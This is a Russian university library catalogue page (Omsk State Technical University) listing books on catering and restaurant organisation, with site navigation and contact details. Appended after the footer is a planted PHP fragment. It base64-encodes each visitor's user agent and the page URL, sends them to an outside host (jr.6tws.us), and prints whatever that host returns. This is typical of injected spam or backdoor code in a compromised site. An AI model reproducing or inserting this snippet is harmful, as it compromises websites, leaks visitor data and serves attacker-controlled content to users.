Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

389 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Закусочная")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Калашников А. Ю. Кафе, бары и рестораны [Текст] : организация, практика и техника обслуживания / А. Ю. Калашников, 2008. - 379 с.
Держатели документа (Информация об экземплярах) 
2. 
Усов, Владимир Васильевич. Организация производства и обслуживания на предприятиях общественного питания : учебное пособие / В. В. Усов, 2007. - 416 с.
Держатели документа (Информация об экземплярах) 
3. 
Калашников А. Ю. Кафе, бары и рестораны [Текст] : организация, практика и техника обслуживания / А. Ю. Калашников, 2006. - 379 с.
4. 
Темерева, Наталия Викторовна. Закусочная на колесах [Текст] : Эффективные решения бизнеса: Практическое пособие / Н. В. Темерева, 2010. - 200 с.
Держатели документа (Информация об экземплярах) 
5. 
Технология обслуживания в общественном питании [Текст] : метод. указания для выполнения курсовой работы / сост. : В. В. Бирюкова, Н. В. Шевченко, 2006. - 36 с.
Держатели документа (Информация об экземплярах) 
Полный текст
6. 
Калашников, Александр Юрьевич. Кафе, бары и рестораны [Текст] : производственно-практическое издание / А. Ю. Калашников, 2005. - 384 с.
7. 
Панова, Лидия Александровна. Организация производства на предприятиях общественного питания (в экзаменационных вопросах и ответах) [Текст] : учеб. пособие / Л. А. Панова, 2005. - 318, [1] с.
Держатели документа (Информация об экземплярах) 

Учебное питание охватывает широкий круг вопросов, связанных с основными направлениями развития общественного питания. Здесь изложены основные вопросы по организации производства в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, училищ, готовящих специалистов для общественого питания. Специальные разделы посвящены практическим вопросам по организации снабжения, складского хозяйства; Подробно описывается организация работы цехов, раздаточных; даны основы рациональной организации труда.

Подача материала в форме экзаменационных вопросов и ответов и текстовый материал позволяют успешно усвоить курс по организации производства на предприятиях общественного питания.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2814 - 22.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.95 с.12 запросов, 0.90c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;